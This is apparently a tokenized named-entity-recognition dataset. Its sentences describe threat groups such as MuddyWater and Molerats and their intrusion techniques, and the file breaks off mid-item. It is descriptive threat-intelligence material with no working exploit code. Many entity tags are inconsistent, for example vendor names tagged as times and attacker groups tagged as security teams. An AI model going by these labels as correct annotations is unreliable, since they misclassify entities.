[ - "Mofang", - "delivered", - "spearphishing", - "emails", - "with", - "malicious", - "links", - "included." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "used", - "forged", - "Microsoft", - "code-signing", - "certificates", - "on", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "used", - "the", - "public", - "tool", - "BrowserPasswordDump10", - "to", - "dump", - "passwords", - "saved", - "in", - "browsers", - "on", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "decompresses", - "ZIP", - "files", - "once", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "delivered", - "compressed", - "executables", - "within", - "ZIP", - "files", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "used", - "executables", - "to", - "download", - "malicious", - "files", - "from", - "different", - "sources." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "used", - "various", - "implants,", - "including", - "those", - "built", - "with", - "JS,", - "on", - "target", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "sent", - "malicious", - "files", - "via", - "email", - "that", - "tricked", - "users", - "into", - "clicking", - "Enable", - "Content", - "to", - "run", - "an", - "embedded", - "macro", - "and", - "to", - "download", - "malicious", - "archives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "sent", - "malicious", - "links", - "via", - "email", - "trick", - "users", - "into", - "opening", - "a", - "RAR", - "archive", - "and", - "running", - "an", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "used", - "msiexec.exe", - "to", - "execute", - "an", - "MSI", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "used", - "PowerShell", - "implants", - "on", - "target", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "actors", - "obtained", - "a", - "list", - "of", - "active", - "processes", - "on", - "the", - "victim", - "and", - "sent", - "them", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "saved", - "malicious", - "files", - "within", - "the", - "AppData", - "and", - "Startup", - "folders", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "created", - "scheduled", - "tasks", - "to", - "persistently", - "run", - "VBScripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "sent", - "phishing", - "emails", - "with", - "malicious", - "Microsoft", - "Word", - "and", - "PDF", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "has", - "sent", - "phishing", - "emails", - "with", - "malicious", - "links", - "included." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Molerats", - "used", - "various", - "implants,", - "including", - "those", - "built", - "with", - "VBScript,", - "on", - "target", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "used", - "signed", - "drivers", - "from", - "an", - "open", - "source", - "tool", - "called", - "DiskCryptor", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "used", - "batch", - "scripts", - "that", - "can", - "disable", - "the", - "Windows", - "firewall", - "on", - "specific", - "remote", - "machines." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "used", - "obfuscated", - "web", - "shells", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-HackOrg", - "B-Org", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "exploited", - "known", - "vulnerabilities", - "in", - "public-facing", - "infrastructure", - "such", - "as", - "Microsoft", - "Exchange", - "Servers." - ], - "ner_tags": [ - "B-HackOrg", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "downloaded", - "and", - "installed", - "web", - "shells", - "to", - "following", - "path", - "<code>C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx</code>." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "collected", - "the", - "administrator", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "built", - "malware,", - "such", - "as", - "DCSrv", - "and", - "PyDCrypt,", - "for", - "targeting", - "victims'", - "machines." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "used", - "batch", - "scripts", - "that", - "can", - "enable", - "SMB", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SecTeam", - "B-Org", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "collected", - "information", - "about", - "the", - "infected", - "host,", - "including", - "the", - "machine", - "names", - "and", - "OS", - "architecture." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "collected", - "the", - "domain", - "name", - "of", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "used", - "the", - "commercial", - "tool", - "DiskCryptor." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Moses", - "Staff", - "has", - "dropped", - "a", - "web", - "shell", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "injected", - "content", - "into", - "DNS,", - "HTTP,", - "and", - "SMB", - "replies", - "to", - "redirect", - "specifically-targeted", - "victims", - "to", - "a", - "fake", - "Windows", - "Update", - "page", - "to", - "download", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "exploited", - "CVE-2021-1732", - "to", - "execute", - "malware", - "components", - "with", - "elevated", - "rights." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "JavaScript", - "to", - "deliver", - "malware", - "hosted", - "on", - "HTML", - "pages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "plugins", - "to", - "execute", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "a", - "reverse", - "proxy", - "tool", - "similar", - "to", - "the", - "GitHub", - "repository", - "revsocks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "plugins", - "to", - "save", - "captured", - "screenshots", - "to", - "`.\\AActdata\\`", - "on", - "an", - "SMB", - "share." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "plugins", - "to", - "take", - "screenshots", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoustachedBouncer", - "has", - "used", - "malware", - "plugins", - "packed", - "with", - "Themida." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "the", - "native", - "Windows", - "cabinet", - "creation", - "tool,", - "makecab.exe,", - "likely", - "to", - "compress", - "stolen", - "data", - "to", - "be", - "uploaded." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "web", - "services", - "including", - "OneHub", - "to", - "distribute", - "remote", - "access", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "uses", - "various", - "techniques", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "CMSTP.exe", - "and", - "a", - "malicious", - "INF", - "to", - "execute", - "its", - "POWERSTATS", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "performed", - "credential", - "dumping", - "with", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "Daniel", - "Bohannon’s", - "Invoke-Obfuscation", - "framework", - "and", - "obfuscated", - "PowerShell", - "scripts.", - "The", - "group", - "has", - "also", - "used", - "other", - "obfuscation", - "methods,", - "including", - "Base64", - "obfuscation", - "of", - "VBScripts", - "and", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "the", - ".NET", - "csc.exe", - "tool", - "to", - "compile", - "executables", - "from", - "downloaded", - "C#", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "has", - "the", - "capability", - "to", - "execute", - "malicious", - "code", - "via", - "COM,", - "DCOM,", - "and", - "Outlook." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "run", - "a", - "tool", - "that", - "steals", - "passwords", - "saved", - "in", - "victim", - "email." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "performed", - "credential", - "dumping", - "with", - "LaZagne", - "and", - "other", - "tools,", - "including", - "by", - "dumping", - "passwords", - "saved", - "in", - "victim", - "email." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "run", - "tools", - "including", - "Browser64", - "to", - "steal", - "passwords", - "saved", - "in", - "victim", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "maintains", - "persistence", - "on", - "victim", - "networks", - "through", - "side-loading", - "dlls", - "to", - "trick", - "legitimate", - "programs", - "into", - "running", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "decoded", - "base64-encoded", - "PowerShell,", - "JavaScript,", - "and", - "VBScript." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "can", - "disable", - "the", - "system's", - "local", - "proxy", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "<code>cmd.exe", - "net", - "user", - "/domain</code>", - "to", - "enumerate", - "domain", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "can", - "execute", - "PowerShell", - "scripts", - "via", - "DDE." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "C2", - "infrastructure", - "to", - "receive", - "exfiltrated", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "exploited", - "the", - "Microsoft", - "Exchange", - "memory", - "corruption", - "vulnerability", - "(CVE-2020-0688)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "exploited", - "the", - "Office", - "vulnerability", - "CVE-2017-0199", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "exploited", - "the", - "Microsoft", - "Netlogon", - "vulnerability", - "(CVE-2020-1472)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Exp", - "O", - "B-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "controlled", - "POWERSTATS", - "from", - "behind", - "a", - "proxy", - "network", - "to", - "obfuscate", - "the", - "C2", - "location.", - "MuddyWater", - "has", - "used", - "a", - "series", - "of", - "compromised", - "websites", - "that", - "victims", - "connected", - "to", - "randomly", - "to", - "relay", - "information", - "to", - "command", - "and", - "control", - "(C2)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "checked", - "if", - "the", - "ProgramData", - "folder", - "had", - "folders", - "or", - "files", - "with", - "the", - "keywords", - "\"Kasper,\"", - "\"Panda,\"", - "or", - "\"ESET.\"" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-HackOrg", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "can", - "upload", - "additional", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "JavaScript", - "files", - "to", - "execute", - "its", - "POWERSTATS", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "performed", - "credential", - "dumping", - "with", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "performed", - "credential", - "dumping", - "with", - "Mimikatz", - "and", - "procdump64.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "stored", - "a", - "decoy", - "PDF", - "file", - "within", - "a", - "victim's", - "`%temp%`", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "attempted", - "to", - "get", - "users", - "to", - "open", - "malicious", - "PDF", - "attachment", - "and", - "to", - "enable", - "macros", - "and", - "launch", - "malicious", - "Microsoft", - "Word", - "documents", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "distributed", - "URLs", - "in", - "phishing", - "e-mails", - "that", - "link", - "to", - "lure", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "disguised", - "malicious", - "executables", - "and", - "used", - "filenames", - "and", - "Registry", - "key", - "names", - "associated", - "with", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "mshta.exe", - "to", - "execute", - "its", - "POWERSTATS", - "payload", - "and", - "to", - "pass", - "a", - "PowerShell", - "one-liner", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "one", - "C2", - "to", - "obtain", - "enumeration", - "scripts", - "and", - "monitor", - "web", - "logs,", - "but", - "a", - "different", - "C2", - "to", - "send", - "data", - "back." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "a", - "Word", - "Template,", - "Normal.dotm,", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "to", - "obtain", - "a", - "list", - "of", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "developed", - "tools", - "in", - "Python", - "including", - "Out1." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "added", - "Registry", - "Run", - "key", - "<code>KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "legitimate", - "applications", - "ScreenConnect", - "and", - "AteraAgent", - "to", - "manage", - "systems", - "remotely", - "and", - "move", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "leveraged", - "rundll32.exe", - "in", - "a", - "Registry", - "Run", - "key", - "to", - "execute", - "a", - ".dll." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "scheduled", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "to", - "check", - "running", - "processes", - "against", - "a", - "hard-coded", - "list", - "of", - "security", - "tools", - "often", - "used", - "by", - "malware", - "researchers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "a", - "PowerShell", - "backdoor", - "to", - "check", - "for", - "Skype", - "connectivity", - "on", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "compromised", - "third", - "parties", - "and", - "used", - "compromised", - "accounts", - "to", - "send", - "spearphishing", - "emails", - "with", - "targeted", - "attachments", - "to", - "recipients." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "sent", - "targeted", - "spearphishing", - "e-mails", - "with", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "tools", - "to", - "encode", - "C2", - "communications", - "including", - "Base64", - "encoding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "stored", - "obfuscated", - "JavaScript", - "code", - "in", - "an", - "image", - "file", - "named", - "temp.jpg." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "AES", - "to", - "encrypt", - "C2", - "responses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "can", - "collect", - "the", - "victim’s", - "OS", - "version", - "and", - "machine", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "to", - "collect", - "the", - "victim’s", - "IP", - "address", - "and", - "domain", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "a", - "PowerShell", - "backdoor", - "to", - "check", - "for", - "Skype", - "connections", - "on", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "can", - "collect", - "the", - "victim’s", - "username." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "made", - "use", - "of", - "legitimate", - "tools", - "ConnectWise", - "and", - "Remote", - "Utilities", - "to", - "gain", - "access", - "to", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "VBScript", - "files", - "to", - "execute", - "its", - "POWERSTATS", - "payload,", - "as", - "well", - "as", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "file", - "sharing", - "services", - "including", - "OneHub,", - "Sync,", - "and", - "TeraBox", - "to", - "distribute", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "a", - "custom", - 